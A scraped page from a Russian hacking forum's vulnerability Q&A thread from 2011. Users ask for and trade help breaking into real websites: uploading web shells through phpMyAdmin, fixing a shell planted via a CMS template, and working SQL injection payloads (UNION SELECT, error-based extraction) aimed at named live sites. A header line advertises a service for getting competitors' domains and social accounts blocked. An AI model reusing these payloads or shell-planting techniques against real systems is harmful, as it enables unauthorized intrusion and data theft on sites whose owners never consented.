УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1666 из 2438

1666

Опции темы

Поиск в этой теме

Опции просмотра

#16651

16.03.2011, 15:01

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

можно ли через phpmyadmin 2.8.0.3 залить шелл не зная полного пути? с примером пожалуйста

Объясните плиз вот это

/showpost.php?p=1323558&postcount=12

#16652

16.03.2011, 15:08

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от noviyuser

noviyuser said:
можно ли через phpmyadmin залить шелл не зная полного пути? с примером пожалуйста

Ты же уже спрашивал!

Если говорят люди "надо узнать полный путь", как думаешь можно!? НЕТ! Максимум, не зная пути, ты можешь залить шелл в /tmp и если есть инклюд, то проинклюдить его!

Цитата:

Сообщение от noviyuser

noviyuser said:
Объясните плиз вот это
/showpost.php?p=1323558&postcount=12

А что тут объяснять? Это эксплоит написанный на Баше, который эксплуатируею уязвимость выполнения PHP-кода в версиях phpMyAdmin 2.11.x - 2.11.9.5; 3.x - 3.1.3.1.

Ну и как бы там есть еще список зависимостей:

Код:

Code:
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

#16653

16.03.2011, 15:45

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

спс, есть таблица blabla-forum, делаю

+from+blabla-forum.phpbb_users+--+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.phpbb_users -- LIMIT 0, 1' at line 1

Как обойти? он видимо думает что черта это конец запроса поэтому ошибка вылазит?

#16654

16.03.2011, 15:53

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

+from+`blabla-forum`.phpbb_users+--+

#16655

16.03.2011, 15:59

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Цитата:

Сообщение от noviyuser

noviyuser said:
спс, есть таблица blabla-forum, делаю
+from+blabla-forum.phpbb_users+--+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.phpbb_users -- LIMIT 0, 1' at line 1
Как обойти? он видимо думает что черта это конец запроса поэтому ошибка вылазит?

Эм.... "есть таблица blabla-forum" => "blabla-forum.phpbb_users" - это что еще за фокусы? о_0 У ТАБЛИЦЫ не может быть ТАБЛИЦЫ, таблицы находяться в DataBase'ах. И запрос имеет вид: [database].[table_name]. Узнать текущую DB можно через database(). А как узнать в какой DB находиться нужная таблица, ЧИТАЙТЕ СТАТЬИ, коих полно на античате. И сразу будет меньше вопросов и вам будет легче.

#16656

16.03.2011, 19:06

asql

Guest

Сообщений: n/a

Провел на форуме:
8829

Репутация: -3

http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&t ype=99999+union+select+1--

Order by определяет 1 столбик, но при попытке вывести его через union select печатает ошибку

The used SELECT statements have a different number of columns

похожее...

Цитата:

Сообщение от Compton

Compton said:
http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7, 8--

#16657

16.03.2011, 19:37

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&t ype=1+or+1+group+by+concat(version(),floor(rand(0) *2))having+min(0)+or+1--+

http://www.cosmeticsdatabase.com/brand.php?brand_id=987+or+1+group+by+concat(versio n(),floor(rand(0)*2))having+min(0)+or+1--+

#16658

16.03.2011, 19:57

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28895

Репутация: 4

Ребят опять подыму вопрос свой т.к. ни одного ответа не было /showpost.php?p=2594004&postcount=16594

#16659

16.03.2011, 20:25

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Цитата:

Сообщение от asql

asql said:
http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&t ype=99999+union+select+1--
Order by определяет 1 столбик, но при попытке вывести его через union select печатает ошибку
The used SELECT statements have a different number of columns

Такое происходит, потому что данный уязвимый GET-параметр участвует в нескольких запросах к разным таблицам, с разным кол-вом полей.

Т.е. в одном запросе ты подобрал правильно кол-во колонок, в другом нет, поэтому ошибка.

Бывают случаи, когда участвует так же несколько запросов, и ты подобрал кол-во колонок, но он вывел ошибку и при этом вывел принтабельное поле. Если же такое кол-во подобрать не удалось, то крутить как BLIND.

#16660

17.03.2011, 12:29

[R]eD

Познающий

Регистрация: 01.08.2006

Сообщений: 35

Провел на форуме:
94171

Репутация: 3

Цитата:

Сообщение от [R

eD"]
[R]eD said:
Залил шелл через админку кмс (засунул шелл в шаблон)
захожу на него все ок - шелл полностью работает.
дальше заливаю шелл отдельно от шаблона, файл залился
НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.
т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.
дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.
все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.
safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...
система freebsd
помогите, не знаю что и думать

вобщем перепробывал все, единственное отличие заливаемых файлов это Owner/Group у моих файлов site/xxx а у остальных site/yyy, но если редактировать уже имеющиеся файлы то все ок.

вылазит все таже Premature end of script headers, как это с правами на файлы связано не ясно...

если заливать простые файлы например .тхт то все ок, выставляешь 0755 права и они открываются (пробывал чтобы обрабатывались как php-script ошибка все также)

что можно сделать?

Страница 1666 из 2438

1666

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход